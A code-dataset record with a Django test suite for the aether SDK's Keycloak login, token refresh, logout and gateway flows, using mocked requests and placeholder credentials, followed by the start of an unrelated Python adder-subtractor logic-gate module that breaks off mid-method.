| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
140bd4371229916c2d5f56c52a91980370ca0a17
| 35,931
|
py
|
Python
|
aether/sdk/auth/keycloak/tests/test_keycloak.py
|
eHealthAfrica/aether-django-sdk-library
|
fc371af89bfed155d465049320f32bf43860d001
|
[
"Apache-2.0"
] | 1
|
2020-05-04T21:05:11.000Z
|
2020-05-04T21:05:11.000Z
|
aether/sdk/auth/keycloak/tests/test_keycloak.py
|
eHealthAfrica/aether-django-sdk-library
|
fc371af89bfed155d465049320f32bf43860d001
|
[
"Apache-2.0"
] | 3
|
2019-09-30T15:45:43.000Z
|
2020-04-29T08:12:37.000Z
|
aether/sdk/auth/keycloak/tests/test_keycloak.py
|
eHealthAfrica/aether-django-sdk-library
|
fc371af89bfed155d465049320f32bf43860d001
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2019 by eHealth Africa : http://www.eHealthAfrica.org
#
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from unittest import mock
from http.cookies import SimpleCookie
from importlib import import_module
from django.conf import settings
from django.contrib.auth import get_user_model
from django.test import RequestFactory, override_settings
from django.urls import reverse, resolve
from aether.sdk.tests import AetherTestCase
from aether.sdk.unittest import MockResponse, UrlsTestCase
from aether.sdk.utils import get_meta_http_name
from aether.sdk.auth.keycloak.utils import _KC_TOKEN_SESSION as TOKEN_KEY
from aether.sdk.auth.keycloak.views import KeycloakLogoutView
user_objects = get_user_model().objects
@override_settings(
AUTH_URL='accounts',
KEYCLOAK_BEHIND_SCENES=True,
)
class KeycloakBehindTests(AetherTestCase, UrlsTestCase):
def test__urls__accounts__login(self):
from django.contrib.auth import views
self.assertEqual(reverse('rest_framework:login'), '/accounts/login')
self.assertEqual(resolve('/accounts/login').func.view_class,
views.LoginView.as_view().view_class)
def test__workflow(self):
FAKE_TOKEN = {
'access_token': 'access-keycloak',
'refresh_token': 'refresh-keycloak',
}
REALM = 'testing'
# login using accounts login entrypoint
LOGIN_URL = reverse('rest_framework:login')
SAMPLE_URL = reverse('testmodel-list')
settings.SESSION_ENGINE = 'django.contrib.sessions.backends.file'
engine = import_module(settings.SESSION_ENGINE)
store = engine.SessionStore()
store.save()
self.client.cookies = SimpleCookie({settings.SESSION_COOKIE_NAME: store.session_key})
self.assertIsNotNone(self.client.session)
# visit any page that requires authentication (without being logged)
response = self.client.get(SAMPLE_URL)
self.assertEqual(response.status_code, 403)
# make realm check fail
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# check realm request
MockResponse(status_code=404),
]) as mock_req_1:
response = self.client.post(LOGIN_URL, data={
'username': 'user',
'password': 'secretsecret',
'realm': 'fake',
})
content = response.content.decode('utf-8')
self.assertIn('Please correct the error below.', content)
self.assertIn('Invalid realm', content)
session = self.client.session
self.assertIsNone(session.get(TOKEN_KEY))
self.assertIsNone(session.get(settings.REALM_COOKIE))
mock_req_1.assert_called_once_with(
method='head',
url=f'{settings.KEYCLOAK_SERVER_URL}/fake/account',
)
# no auth yet
session = self.client.session
self.assertIsNone(session.get(TOKEN_KEY))
self.assertIsNone(session.get(settings.REALM_COOKIE))
# make get `token` from keycloack fail
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# check realm request
MockResponse(status_code=204),
# get token from keycloak
MockResponse(status_code=400),
]) as mock_req_2:
response = self.client.post(LOGIN_URL, data={
'username': 'user',
'password': 'secretsecret',
'realm': REALM,
})
content = response.content.decode('utf-8')
self.assertIn('Please enter a correct username and password.', content)
self.assertIn('Note that both fields may be case-sensitive.', content)
mock_req_2.assert_has_calls([
mock.call(
method='head',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/account',
),
mock.call(
method='post',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
data={
'grant_type': 'password',
'client_id': settings.KEYCLOAK_CLIENT_ID,
'username': 'user',
'password': 'secretsecret',
},
),
])
# no auth yet
session = self.client.session
self.assertIsNone(session.get(TOKEN_KEY))
self.assertIsNone(session.get(settings.REALM_COOKIE))
# make get `userinfo` from keyclock fail (unlikely if `token` doesn't)
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# check realm request
MockResponse(status_code=204),
# get token from keycloak
MockResponse(status_code=200, json_data=FAKE_TOKEN),
# get userinfo from keycloak
MockResponse(status_code=404),
]) as mock_req_3:
response = self.client.post(LOGIN_URL, data={
'username': 'user',
'password': 'secretsecret',
'realm': REALM,
})
content = response.content.decode('utf-8')
self.assertIn('Please enter a correct username and password.', content)
self.assertIn('Note that both fields may be case-sensitive.', content)
mock_req_3.assert_has_calls([
mock.call(
method='head',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/account',
),
mock.call(
method='post',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
data={
'grant_type': 'password',
'client_id': settings.KEYCLOAK_CLIENT_ID,
'username': 'user',
'password': 'secretsecret',
},
),
mock.call(
method='get',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/userinfo',
headers={'Authorization': 'Bearer {}'.format(FAKE_TOKEN['access_token'])},
),
])
# no auth yet
session = self.client.session
self.assertIsNone(session.get(TOKEN_KEY))
self.assertIsNone(session.get(settings.REALM_COOKIE))
# finally, logs in
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# check realm request
MockResponse(status_code=204),
# get token from keycloak
MockResponse(status_code=200, json_data=FAKE_TOKEN),
# get userinfo from keycloak
MockResponse(status_code=200, json_data={
'preferred_username': 'user',
'given_name': 'given',
'family_name': 'family',
'email': 'user@example.com',
}),
]) as mock_req_4:
self.assertEqual(user_objects.filter(username='testing__user').count(), 0)
response = self.client.post(LOGIN_URL, data={
'username': 'user',
'password': 'secretsecret',
'realm': REALM,
})
self.assertEqual(user_objects.filter(username='testing__user').count(), 1)
user = user_objects.get(username='testing__user')
self.assertEqual(user.first_name, 'given')
self.assertEqual(user.last_name, 'family')
self.assertEqual(user.email, 'user@example.com')
session = self.client.session
self.assertEqual(session.get(TOKEN_KEY), FAKE_TOKEN)
self.assertEqual(session.get(settings.REALM_COOKIE), REALM)
mock_req_4.assert_has_calls([
mock.call(
method='head',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/account',
),
mock.call(
method='post',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
data={
'grant_type': 'password',
'client_id': settings.KEYCLOAK_CLIENT_ID,
'username': 'user',
'password': 'secretsecret',
},
),
mock.call(
method='get',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/userinfo',
headers={'Authorization': 'Bearer {}'.format(FAKE_TOKEN['access_token'])},
),
])
# visit any page that requires authentication
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# refresh token in keycloak
MockResponse(status_code=200, json_data=FAKE_TOKEN),
]) as mock_req_5:
response = self.client.get(SAMPLE_URL)
self.assertEqual(response.status_code, 200)
mock_req_5.assert_called_once_with(
method='post',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
data={
'grant_type': 'refresh_token',
'client_id': settings.KEYCLOAK_CLIENT_ID,
'refresh_token': FAKE_TOKEN['refresh_token'],
},
)
# visit any page that requires authentication and fails
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# refresh token in keycloak
MockResponse(status_code=400),
# log outs call
MockResponse(status_code=204),
]) as mock_req_6:
response = self.client.get(SAMPLE_URL)
self.assertEqual(response.status_code, 403)
mock_req_6.assert_has_calls([
mock.call(
method='post',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
data={
'grant_type': 'refresh_token',
'client_id': settings.KEYCLOAK_CLIENT_ID,
'refresh_token': FAKE_TOKEN['refresh_token'],
},
),
mock.call(
method='post',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/logout',
data={
'client_id': settings.KEYCLOAK_CLIENT_ID,
'refresh_token': FAKE_TOKEN['refresh_token'],
},
),
])
# side effect of being logged out
session = self.client.session
self.assertIsNone(session.get(TOKEN_KEY))
self.assertIsNone(session.get(settings.REALM_COOKIE))
# logs in again
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# check realm request
MockResponse(status_code=204),
# get token from keycloak
MockResponse(status_code=200, json_data=FAKE_TOKEN),
# get userinfo from keycloak
MockResponse(status_code=200, json_data={
'preferred_username': 'user',
'given_name': 'John',
'family_name': 'Doe',
'email': 'john.doe@example.com',
}),
]):
response = self.client.post(LOGIN_URL, data={
'username': 'user',
'password': 'secretsecret',
'realm': REALM,
})
# user data is updated
user = user_objects.get(username='testing__user')
self.assertEqual(user.first_name, 'John')
self.assertEqual(user.last_name, 'Doe')
self.assertEqual(user.email, 'john.doe@example.com')
# logs out
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request') as mock_req_7:
self.client.logout()
mock_req_7.assert_called_once_with(
method='post',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/logout',
data={
'client_id': settings.KEYCLOAK_CLIENT_ID,
'refresh_token': FAKE_TOKEN['refresh_token'],
},
)
session = self.client.session
self.assertIsNone(session.get(TOKEN_KEY))
self.assertIsNone(session.get(settings.REALM_COOKIE))
# logs out and visit any page again
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request') as mock_req_8:
self.client.logout()
self.assertEqual(self.client.get(SAMPLE_URL).status_code, 403)
mock_req_8.assert_not_called()
@override_settings(
AUTH_URL='accounts',
KEYCLOAK_BEHIND_SCENES=False,
)
class KeycloakTests(UrlsTestCase):
def test__urls__accounts__login(self):
from aether.sdk.auth.keycloak.views import KeycloakLoginView
self.assertEqual(reverse('rest_framework:login'), '/accounts/login')
self.assertEqual(resolve('/accounts/login').func.view_class,
KeycloakLoginView.as_view().view_class)
def test__workflow(self):
FAKE_TOKEN = {
'access_token': 'access-keycloak',
'refresh_token': 'refresh-keycloak',
}
REALM = 'testing'
# login using accounts login entrypoint
LOGIN_URL = reverse('rest_framework:login')
SAMPLE_URL = reverse('testmodel-list')
settings.SESSION_ENGINE = 'django.contrib.sessions.backends.file'
engine = import_module(settings.SESSION_ENGINE)
store = engine.SessionStore()
store.save()
self.client.cookies = SimpleCookie({settings.SESSION_COOKIE_NAME: store.session_key})
self.assertIsNotNone(self.client.session)
# visit any page that requires authentication (without being logged)
response = self.client.get(SAMPLE_URL)
self.assertEqual(response.status_code, 403)
# make realm check fail
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# check realm request
MockResponse(status_code=404),
]) as mock_req_1:
response = self.client.post(LOGIN_URL, data={'realm': 'fake'})
content = response.content.decode('utf-8')
self.assertIn('Please correct the error below.', content)
self.assertIn('Invalid realm', content)
session = self.client.session
self.assertIsNone(session.get(TOKEN_KEY))
self.assertIsNone(session.get(settings.REALM_COOKIE))
mock_req_1.assert_called_once_with(
method='head',
url=f'{settings.KEYCLOAK_SERVER_URL}/fake/account',
)
# check that the login response is a redirection to keycloak server
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# check realm request
MockResponse(status_code=204),
]) as mock_req_2:
response = self.client.post(LOGIN_URL, data={'realm': REALM})
self.assertEqual(response.status_code, 302)
self.assertIn(
f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/auth?'
f'&client_id={settings.KEYCLOAK_CLIENT_ID}'
'&scope=openid'
'&response_type=code'
'&redirect_uri=',
response.url)
mock_req_2.assert_called_once_with(
method='head',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/account',
)
# realm is in session but not the token
session = self.client.session
self.assertNotIn(TOKEN_KEY, session)
self.assertEqual(session.get(settings.REALM_COOKIE), REALM)
# go to login page without the proper params does nothing
self.client.get(LOGIN_URL)
# realm is in session but not the token
session = self.client.session
self.assertNotIn(TOKEN_KEY, session)
self.assertEqual(session.get(settings.REALM_COOKIE), REALM)
# make get `token` from keycloack fail
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# get token from keycloak
MockResponse(status_code=404),
]) as mock_req_3:
# send keycloak response to login page
response = self.client.get(LOGIN_URL + '?code=123&session_state=abc')
mock_req_3.assert_called_once_with(
method='post',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
data={
'grant_type': 'authorization_code',
'client_id': settings.KEYCLOAK_CLIENT_ID,
'client_session_state': 'abc',
'client_session_host': mock.ANY,
'code': '123',
'redirect_uri': mock.ANY,
},
)
# realm is not in session
session = self.client.session
self.assertNotIn(TOKEN_KEY, session)
self.assertIsNone(session.get(settings.REALM_COOKIE))
# make get `userinfo` from keyclock fail (unlikely if `token` doesn't)
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# check realm request
MockResponse(status_code=204),
# get token from keycloak
MockResponse(status_code=200, json_data=FAKE_TOKEN),
# get userinfo from keycloak
MockResponse(status_code=404),
]) as mock_req_4:
# first step
response = self.client.post(LOGIN_URL, data={'realm': REALM})
# realm is in session but not the token
session = self.client.session
self.assertNotIn(TOKEN_KEY, session)
self.assertEqual(session.get(settings.REALM_COOKIE), REALM)
# second step
response = self.client.get(LOGIN_URL + '?code=123&session_state=abc')
content = response.content.decode('utf-8')
self.assertIn('An error ocurred while authenticating against keycloak', content)
# realm is not in session
session = self.client.session
self.assertNotIn(TOKEN_KEY, session)
self.assertIsNone(session.get(settings.REALM_COOKIE))
mock_req_4.assert_has_calls([
mock.call(
method='head',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/account',
),
mock.call(
method='post',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
data={
'grant_type': 'authorization_code',
'client_id': settings.KEYCLOAK_CLIENT_ID,
'client_session_state': 'abc',
'client_session_host': mock.ANY,
'code': '123',
'redirect_uri': mock.ANY,
},
),
mock.call(
method='get',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/userinfo',
headers={'Authorization': 'Bearer {}'.format(FAKE_TOKEN['access_token'])},
),
])
# finally, logs in
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# check realm request
MockResponse(status_code=204),
# get token from keycloak
MockResponse(status_code=200, json_data=FAKE_TOKEN),
# get userinfo from keycloak
MockResponse(status_code=200, json_data={
'preferred_username': 'user',
'given_name': 'given',
'family_name': 'family',
'email': 'user@example.com',
}),
]) as mock_req_5:
self.assertEqual(user_objects.filter(username='testing__user').count(), 0)
# first step
response = self.client.post(LOGIN_URL, data={'realm': REALM})
# second step
response = self.client.get(LOGIN_URL + '?code=123&session_state=abc')
self.assertEqual(user_objects.filter(username='testing__user').count(), 1)
user = user_objects.get(username='testing__user')
self.assertEqual(user.first_name, 'given')
self.assertEqual(user.last_name, 'family')
self.assertEqual(user.email, 'user@example.com')
session = self.client.session
self.assertEqual(session.get(TOKEN_KEY), FAKE_TOKEN)
self.assertEqual(session.get(settings.REALM_COOKIE), REALM)
mock_req_5.assert_has_calls([
mock.call(
method='head',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/account',
),
mock.call(
method='post',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
data={
'grant_type': 'authorization_code',
'client_id': settings.KEYCLOAK_CLIENT_ID,
'client_session_state': 'abc',
'client_session_host': mock.ANY,
'code': '123',
'redirect_uri': mock.ANY,
},
),
mock.call(
method='get',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/userinfo',
headers={'Authorization': 'Bearer {}'.format(FAKE_TOKEN['access_token'])},
),
])
# visit any page that requires authentication
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# refresh token in keycloak
MockResponse(status_code=200, json_data=FAKE_TOKEN),
]) as mock_req_6:
response = self.client.get(SAMPLE_URL)
self.assertEqual(response.status_code, 200)
mock_req_6.assert_called_once_with(
method='post',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
data={
'grant_type': 'refresh_token',
'client_id': settings.KEYCLOAK_CLIENT_ID,
'refresh_token': FAKE_TOKEN['refresh_token'],
},
)
# visit any page that requires authentication and fails
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# refresh token in keycloak
MockResponse(status_code=400),
# log outs call
MockResponse(status_code=204),
]) as mock_req_7:
response = self.client.get(SAMPLE_URL)
self.assertEqual(response.status_code, 403)
mock_req_7.assert_has_calls([
mock.call(
method='post',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/token',
data={
'grant_type': 'refresh_token',
'client_id': settings.KEYCLOAK_CLIENT_ID,
'refresh_token': FAKE_TOKEN['refresh_token'],
},
),
mock.call(
method='post',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/logout',
data={
'client_id': settings.KEYCLOAK_CLIENT_ID,
'refresh_token': FAKE_TOKEN['refresh_token'],
},
),
])
# side effect of being logged out
session = self.client.session
self.assertIsNone(session.get(TOKEN_KEY))
self.assertIsNone(session.get(settings.REALM_COOKIE))
# logs in again
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# check realm request
MockResponse(status_code=204),
# get token from keycloak
MockResponse(status_code=200, json_data=FAKE_TOKEN),
# get userinfo from keycloak
MockResponse(status_code=200, json_data={
'preferred_username': 'user',
'given_name': 'John',
'family_name': 'Doe',
'email': 'john.doe@example.com',
}),
]):
# first step
response = self.client.post(LOGIN_URL, data={'realm': REALM})
# second step
response = self.client.get(LOGIN_URL + '?code=123&session_state=abc')
# user data is updated
user = user_objects.get(username='testing__user')
self.assertEqual(user.first_name, 'John')
self.assertEqual(user.last_name, 'Doe')
self.assertEqual(user.email, 'john.doe@example.com')
# logs out
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request') as mock_req_8:
self.client.logout()
mock_req_8.assert_called_once_with(
method='post',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/logout',
data={
'client_id': settings.KEYCLOAK_CLIENT_ID,
'refresh_token': FAKE_TOKEN['refresh_token'],
},
)
session = self.client.session
self.assertIsNone(session.get(TOKEN_KEY))
self.assertIsNone(session.get(settings.REALM_COOKIE))
# logs out and visit any page again
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request') as mock_req_9:
self.client.logout()
self.assertEqual(self.client.get(SAMPLE_URL).status_code, 403)
mock_req_9.assert_not_called()
class KeycloakGatewayTests(UrlsTestCase):
def test_logout(self):
logout_url = reverse('logout')
self.assertEqual(logout_url, '/logout')
self.assertNotEqual(logout_url, reverse('rest_framework:logout'))
response = self.client.get(logout_url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.template_name[0], settings.LOGGED_OUT_TEMPLATE)
settings.SESSION_ENGINE = 'django.contrib.sessions.backends.file'
engine = import_module(settings.SESSION_ENGINE)
store = engine.SessionStore()
store.save()
request = RequestFactory().get('/')
setattr(request, 'session', store)
# No next page: displays logged out template
response = KeycloakLogoutView.as_view(
next_page=None,
template_name=settings.LOGGED_OUT_TEMPLATE,
)(request)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.template_name[0], settings.LOGGED_OUT_TEMPLATE)
# No realm: goes to next page
response = KeycloakLogoutView.as_view(next_page='/check-app')(request)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/check-app')
# Public realm: goes to next page
next_page = f'/{settings.GATEWAY_PUBLIC_REALM}/{settings.GATEWAY_SERVICE_ID}/check-app'
response = KeycloakLogoutView.as_view(next_page=next_page)(request)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, next_page)
# No public realm: goes to gateway logout
next_page = f'/realm-name/{settings.GATEWAY_SERVICE_ID}/check-app'
response = KeycloakLogoutView.as_view(next_page=next_page)(request)
self.assertEqual(response.status_code, 302)
self.assertIn(
f'/realm-name/{settings.GATEWAY_SERVICE_ID}/logout',
response.url)
def test_workflow(self):
FAKE_TOKEN = 'access-keycloak'
REALM = 'testing'
SAMPLE_URL = reverse('testmodel-list', kwargs={'realm': REALM})
HTTP_HEADER = get_meta_http_name(settings.GATEWAY_HEADER_TOKEN)
self.assertEqual(SAMPLE_URL, f'/{REALM}/{settings.GATEWAY_SERVICE_ID}/testtestmodel/')
# visit any page without a valid token
response = self.client.get(SAMPLE_URL)
self.assertEqual(response.status_code, 403)
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# get userinfo from keycloak
MockResponse(status_code=404),
]) as mock_req_1:
response = self.client.get(SAMPLE_URL, **{HTTP_HEADER: FAKE_TOKEN})
self.assertEqual(response.status_code, 403)
mock_req_1.assert_called_once_with(
method='get',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/userinfo',
headers={'Authorization': f'Bearer {FAKE_TOKEN}'},
)
# visit any page with a valid token
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# get userinfo from keycloak
MockResponse(status_code=200, json_data={
'preferred_username': 'user',
'given_name': 'John',
'family_name': 'Doe',
'email': 'john.doe@example.com',
}),
]) as mock_req_2:
self.assertEqual(user_objects.filter(username='testing__user').count(), 0)
response = self.client.get(SAMPLE_URL, **{HTTP_HEADER: FAKE_TOKEN})
self.assertEqual(response.status_code, 200)
self.assertEqual(user_objects.filter(username='testing__user').count(), 1)
user = user_objects.get(username='testing__user')
self.assertEqual(user.first_name, 'John')
self.assertEqual(user.last_name, 'Doe')
self.assertEqual(user.email, 'john.doe@example.com')
mock_req_2.assert_called_once_with(
method='get',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/userinfo',
headers={'Authorization': f'Bearer {FAKE_TOKEN}'},
)
session = self.client.session
self.assertTrue(session.get(settings.GATEWAY_HEADER_TOKEN),
'flagged as gateway authenticated')
self.assertEqual(session.get(settings.REALM_COOKIE), REALM)
# visit same page with a valid token again
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
side_effect=[
# get userinfo from keycloak
MockResponse(status_code=200, json_data={
'preferred_username': 'user',
'given_name': 'John',
'family_name': 'Smith',
'email': 'john.smith@example.com',
}),
]) as mock_req_3:
self.assertEqual(user_objects.filter(username='testing__user').count(), 1)
response = self.client.get(SAMPLE_URL, **{HTTP_HEADER: FAKE_TOKEN})
self.assertEqual(response.status_code, 200)
self.assertEqual(user_objects.filter(username='testing__user').count(), 1)
user = user_objects.get(username='testing__user')
self.assertEqual(user.first_name, 'John')
self.assertEqual(user.last_name, 'Smith')
self.assertEqual(user.email, 'john.smith@example.com')
mock_req_3.assert_called_once_with(
method='get',
url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/userinfo',
headers={'Authorization': f'Bearer {FAKE_TOKEN}'},
)
# visit any page without a valid token
response = self.client.get(SAMPLE_URL)
self.assertEqual(response.status_code, 403)
# the user is logged out
session = self.client.session
self.assertIsNone(session.get(settings.GATEWAY_HEADER_TOKEN))
self.assertIsNone(session.get(settings.REALM_COOKIE))
# visit a non gateway page with the token
with mock.patch('aether.sdk.auth.keycloak.utils.exec_request') as mock_req_4:
response = self.client.get(reverse('testmodel-list'), **{HTTP_HEADER: FAKE_TOKEN})
self.assertEqual(response.status_code, 403)
mock_req_4.assert_not_called()
| 43.238267
| 99
| 0.544627
| 3,546
| 35,931
| 5.321207
| 0.084602
| 0.050877
| 0.038476
| 0.036568
| 0.890773
| 0.870687
| 0.859611
| 0.849118
| 0.832371
| 0.826064
| 0
| 0.01059
| 0.356127
| 35,931
| 830
| 100
| 43.290361
| 0.805014
| 0.087891
| 0
| 0.827362
| 0
| 0
| 0.19618
| 0.104686
| 0
| 0
| 0
| 0
| 0.20684
| 1
| 0.009772
| false
| 0.021173
| 0.027687
| 0
| 0.042345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
143afa2a3ac5466b576ac87ae8b831db9911e23c
| 13,495
|
py
|
Python
|
bitwise/arithmetic/ADD_SUB.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
bitwise/arithmetic/ADD_SUB.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
bitwise/arithmetic/ADD_SUB.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
"""
The following classes are defined:
AdderSubtractor4
AdderSubtractor8
AdderSubtractor16
"""
from .. import wire
from .. import gate
from .. import signal
from . import ADD
Wire = wire.Wire
Bus4 = wire.Bus4
Bus8 = wire.Bus8
Bus16 = wire.Bus16
class AdderSubtractor4:
"""Construct a new 4-bit adder-subtractor.
Args:
add_subtract: An object of type Wire. Indicates the operation to carry
out - 0 for addition, 1 for subtraction.
a_bus: An object of type Bus4. The first addend, or the minuend.
a_bus[0] and a_bus[3] are the most and least significant bit,
respectively. a_bus[0] is the sign bit in subtraction operations.
b_bus: An object of type Bus4. The second addend, or the subtrahend.
b_bus[0] and b_bus[3] are the most and least significant bit,
respectively. b_bus[0] is the sign bit in subtraction operations.
overflow: An object of type Wire. The overflow indicator of the
subtractor.
carry_out: An object of type Wire. The carry-out of the adder.
sum_bus: An object of type Bus4. The sum of the two addends, or the
difference between the minuend and the subtrahend. sum_bus[0] and
sum_bus[3] are the most and least significant bit, respectively.
sum_bus[0] is the sign bit in subtraction operations.
Raises:
TypeError: If either a_bus, b_bus, or sum_bus is not a bus of width 4.
"""
def __init__(
self,
add_subtract,
a_bus,
b_bus,
overflow,
carry_out,
sum_bus
):
if len(a_bus.wires) != 4:
raise TypeError(
"Expected bus of width 4, received bus of width {0}.".format(
len(a_bus.wires)
)
)
if len(b_bus.wires) != 4:
raise TypeError(
"Expected bus of width 4, received bus of width {0}.".format(
len(b_bus.wires)
)
)
if len(sum_bus.wires) != 4:
raise TypeError(
"Expected bus of width 4, received bus of width {0}.".format(
len(sum_bus.wires)
)
)
wire_1 = Wire()
wire_2 = Wire()
wire_3 = Wire()
wire_4 = Wire()
not_input_1 = Wire()
not_input_2 = Wire()
not_output = Wire()
and_1_wire = Wire()
and_2_wire = Wire()
bus_1 = Bus4(wire_1, wire_2, wire_3, wire_4)
input_1 = a_bus.wires
input_2 = b_bus.wires
output = sum_bus.wires
signal.ControlledInverter4(add_subtract, b_bus, bus_1)
ADD.Adder4(add_subtract, a_bus, bus_1, carry_out, sum_bus)
gate.NOTGate(input_1[0], not_input_1)
gate.NOTGate(input_2[0], not_input_2)
gate.NOTGate(output[0], not_output)
gate.ANDGate3(input_1[0], not_input_2, not_output, and_1_wire)
gate.ANDGate3(not_input_1, input_2[0], output[0], and_2_wire)
gate.ORGate2(and_1_wire, and_2_wire, overflow)
self.add_subtract = add_subtract
self.a_bus = a_bus
self.b_bus = b_bus
self.overflow = overflow
self.carry_out = carry_out
self.sum_bus = sum_bus
def __str__(self):
str_ = ""
str_ += "add_subtract: " + str(self.add_subtract.value) + "\n"
str_ += "a_bus: " + self.a_bus.__str__() + "\n"
str_ += "b_bus: " + self.b_bus.__str__() + "\n"
str_ += "overflow: " + str(self.overflow.value) + "\n"
str_ += "carry_out: " + str(self.carry_out.value) + "\n"
str_ += "sum_bus: " + self.sum_bus.__str__()
return str_
def __call__(
self, *,
add_subtract=None,
a_bus=None,
b_bus=None,
overflow=None,
carry_out=None,
sum_bus=None
):
if add_subtract is not None:
self.add_subtract.value = add_subtract
if a_bus is not None:
self.a_bus.wire_values = a_bus
if b_bus is not None:
self.b_bus.wire_values = b_bus
if overflow is not None:
self.overflow.value = overflow
if carry_out is not None:
self.carry_out.value = carry_out
if sum_bus is not None:
self.sum_bus.wire_values = sum_bus
class AdderSubtractor8:
"""Construct a new 8-bit adder-subtractor.
Args:
add_subtract: An object of type Wire. Indicates the operation to carry
out - 0 for addition, 1 for subtraction.
a_bus: An object of type Bus8. The first addend, or the minuend.
a_bus[0] and a_bus[7] are the most and least significant bit,
respectively. a_bus[0] is the sign bit in subtraction operations.
b_bus: An object of type Bus8. The second addend, or the subtrahend.
b_bus[0] and b_bus[7] are the most and least significant bit,
respectively. b_bus[0] is the sign bit in subtraction operations.
overflow: An object of type Wire. The overflow indicator of the
subtractor.
carry_out: An object of type Wire. The carry-out of the adder.
sum_bus: An object of type Bus8. The sum of the two addends, or the
difference between the minuend and the subtrahend. sum_bus[0] and
sum_bus[7] are the most and least significant bit, respectively.
sum_bus[0] is the sign bit in subtraction operations.
Raises:
TypeError: If either a_bus, b_bus, or sum_bus is not a bus of width 8.
"""
def __init__(
self,
add_subtract,
a_bus,
b_bus,
overflow,
carry_out,
sum_bus
):
if len(a_bus.wires) != 8:
